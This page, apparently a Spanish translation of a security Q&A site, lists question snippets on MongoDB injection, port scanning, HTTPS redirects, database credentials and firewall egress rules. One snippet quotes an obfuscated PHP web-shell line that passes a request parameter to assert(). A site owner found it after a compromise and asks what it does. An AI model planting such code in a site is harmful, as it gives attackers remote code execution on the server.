Todas las preguntas

4
respuestas

¿Qué tipo de ataques se pueden usar contra MongoDB?

Estoy empezando a aprender MongoDB y sentí curiosidad por saber si era susceptible a algún tipo de ataque de inyección similar a SQLi . Debido a la naturaleza de la base de datos, no creo pensar que se pueda inyectar en ella, pero ... ¿Qué o...
pregunta 07.11.2012 - 17:08
3
respuestas

¿Es posible crear un archivo que nunca complete su proceso de descarga? [cerrado]

¿Es posible crear un archivo desde cero que cuando se descarga a través de HTTP, la descarga nunca se completa? No estoy hablando de ZIP BOMB aquí. Algunos programas de descarga le permiten descargar eventos de transmisión, por lo que no se c...
pregunta 07.03.2017 - 10:30
2
respuestas

¿Qué hace este código PHP sospechoso? [duplicar]

Estoy limpiando un sitio web después de un ataque que resultó en la carga de muchos PHP shells. He encontrado y eliminado el siguiente código: if(isset($_REQUEST['e'])) { $b="ass"."ert";$a=$b($_REQUEST['e']);${'a'}; } ¿Podría decir...
pregunta 13.01.2017 - 00:06
6
respuestas

¿Por qué los hackers escanean en busca de puertos abiertos?

Por lo tanto, cada vez que escuche sobre pequeños piratas informáticos que piratean sitios web oirá un "escaneo de puertos". Entiendo lo que es (buscando todos los puertos / servicios abiertos en una máquina remota), sin embargo eso plantea la...
pregunta 17.04.2016 - 01:41
6
respuestas

¿Qué tan seguro es redirigir al usuario de http://normal.bank.com a https://secure.bank.com?

Tengo una aplicación. Que funciona en http, enlace . Sin embargo, para iniciar sesión, realizar cualquier acción, etc. Estoy redireccionando al usuario a enlace , donde el usuario puede iniciar sesión y realizar la acción. ¿Esto es todavía vul...
pregunta 03.11.2013 - 09:06
6
respuestas

¿Es una mala práctica mostrar su dirección IP en la URL?

Alguien me dijo que mostrar su dirección IP en una URL (como http://192.0.2.34/default.html ) es más fácil de piratear. ¿Es eso cierto? Podría rastrear cualquier nombre de dominio y obtener su número de IP también.     
pregunta 09.05.2013 - 16:32
6
respuestas

Como principiante en Seguridad de TI, ¿debería aprender TCP / IP?

Soy profesor universitario y desarrollador de software web y de escritorio. Por muchas razones, quiero aprender la seguridad del software para cambiar mi campo a largo plazo. Hace unos días que empecé a estudiar TCP / IP como mi primer paso en e...
pregunta 30.11.2012 - 13:20
4
respuestas

¿Qué puede hacer un atacante si conoce las credenciales de mi base de datos?

Si un atacante conoce el nombre de usuario y la contraseña de mi base de datos, ¿qué puede hacer si no tiene acceso a mi servidor? Digamos que mi base de datos está utilizando Microsoft SQL Server. ¿Hay alguna forma en que pueda usar esas creden...
pregunta 06.02.2014 - 15:00
8
respuestas

Una fuerza destructiva siempre puede filtrar información a través de paquetes HTTP. ¿Debo molestarme en configurar las reglas de salida en mi firewall?

Conozco los cortafuegos, pero no soy un experto en seguridad. Y recientemente, me pregunto cómo configurar efectivamente las reglas de salida del firewall de cualquier empresa. Por el bien de la pregunta, supongamos que hay un software antiv...
pregunta 04.01.2016 - 11:00
6
respuestas

Enviar un puntaje alto del lado del cliente a un servidor de forma segura [duplicado]

Estoy creando una aplicación web que contiene un juego javascript simple. Una vez que el jugador terminó de jugar, la puntuación más alta se envía al servidor y se guarda. Después de un período específico, el jugador con la mejor puntuación...
pregunta 15.01.2017 - 10:45